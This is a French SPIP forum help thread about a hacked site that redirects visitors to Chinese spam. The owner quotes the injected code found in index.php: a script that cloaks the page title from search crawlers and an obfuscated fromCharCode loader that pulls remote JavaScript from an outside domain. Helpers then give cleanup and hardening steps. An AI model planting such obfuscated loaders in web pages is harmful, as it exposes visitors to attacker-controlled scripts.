[Résolu] site piraté ou sous phishing comment sauver sa plateforme?

Général
1

Bonjour, j’ai conçu une plateforme et depuis que je l’ais mis en ligne (déjà il faut noté qu’une fois en ligne j’ai eu du mal avec la restauration de ma base donc j’ai dû transporter tout mon dossier config avec base pour que le projet marche),mais je rencontre des soucis

Prémièrement je remarque que mon site revient a une version inachevé sans vraiment prendre mon squelette en compte

Deuxièmement quand j’essaie d’envoyé le lien a une autre personne , le content est du chinois et le problème est que lorsque l’on clique deçu sa nous ramène vers un site chinois, j’ai beau faire la réinstallation ou même le changement des fichiers mais après j’ai toujours le même probleme après 2/3 jours.

je demande vraiment de l’aide pour pouvoir resoudre mon problème car je ne sais pas si le problème c’est sur mon serveur ou dans mon code

2

Bonjour,

URL du site ?
Version de SPIP ?

Est-ce que le fichier .htaccess contient une redirection inappropriée ?
Ou index.php modifié (hacké) ?

3

Salut, comment vas tu? merci pour la reponse, j’etais avant a spip 4.2.8 et tu m’avais conseillé de passer a 4.2.14, mais même après ça j’ai toujours le problème que j’ai cité aujourd’hui, https://pdu-ue-mali-mauritanie.org

4

Pour les images qui manquent, ça sent les droits apache sur les fichiers sur le serveur.

5

apparemment il y’avait un script dans mon fichier index y’avait ça:

<script>
  if(!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)){
    document.title ="Accueil | Pdu-ue-mali-mauritanie.org"
  }
</script>

et ça:

<script type="text/javascript"> 
  var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,111,106,98,107,106,115,46,118,105,112,47,121,98,46,106,115,34,62,60,47,115,99,114,105,112,116,62); 
  document.write(xt);
</script>
6

maintenant ma question sa sera comment me protèger de cet type d’attaque?

7

Il va falloir précéder à un nettoyage en profondeur.

En gros :

  1. Déplacer tout dans un sous dossier
  2. Réinstaller SPIP avec spip_loader.php
  3. Réinstaller 1 par 1 les plugins via la gestion des plugins de SPIP (SVP)
  4. Remettre le dossier IMG après avoir vérifié qu’il n’y avait aucun fichier « bizarre »
  5. Remettre le dossier squelettes après avoir vérifié qu’il n’y avait aucun fichier « bizarre » ou modifié

Voir aussi : Alerte : vague de piratage de sites depuis le 23 avril 2023 : pas d’accès à /ecrire (version SPIP inférieures à 3.2.18, 4.1.8 et 4.2.1)

Et aussi changer le mot de passe FTP et MySQL.

Et vérifier le contenu de la base MySQL (rechercher des appels de scripts JS)

8

ok je vais le faire tout de suite, merci Beaucoup, j’espère m’en sortir avec ça
merci

1 « J'aime »
9

J’ai l’impression que ça va beaucoup mieux que tout à l’heure. Bravo !

10

oui effectivemennt, avec votre aide et celle d’un ami, j’ai pu faire des corrections et j’espère que ça va tenir
encore merci pour le soutien

1 « J'aime »
11

Si tu as bien suivi la démarche proposée par @RealET notamment les points 4 et 5, et que tu maintiens ton SPIP à jour il ne devrait pas y avoir de souci. Je passe le sujet en résolu :slight_smile:

1 « J'aime »
12

Bonjour,

N’étant pas du tout informaticienne et ayant des fichiers de mon spip vérolés, je viens de réinstaller complètement SPiP en suivant les conseils de RealET et de la page dédiée sur spip.net (avec spip_loader) :

  • sauver ma base sql
  • mettre à jour tous les plugins
  • déplacer le spip foireux dans un sous-dossier
  • réinstaller spip
  • copier les plugins mis à jour depuis le dossier de la version du spip foireux vers le nouveau spip tout neuf

J’ai vaguement regardé les fichiers des dossiers IMG et squelettes du spip foireux (en ouvrant certains avec Notepad++), mais je ne suis pas sûre de repérer ce qui cloche !

Pour le changement du mot de passe ftp, pas de souci (je suis chez Ouvaton, c’est facile dans l’interface de config), par contre pour la base sql, je ne sais pas où ni comment « farfouiller » pour :

  • changer le mot de passe
  • vérifier son contenu (je pense d’ailleurs être incapable de voir ce qui est « bizarre » et encore moins de le corriger !)

J’ai aussi lu qu’en changeant de version de spip on ne pouvais pas restaurer notre base sql. Comment faire pour récupérer les données ?

Merci pour votre aide.

13

En changeant de version de SPIP, on ne peut pas utiliser une sauvegarde faite avec SPIP dans une version différente.

Mais une sauvegarde PHPMyAdmin, ça marche direct !

1 « J'aime »
14

Merci beaucoup à RealET pour le coup de main « en live » :slight_smile:

1 « J'aime »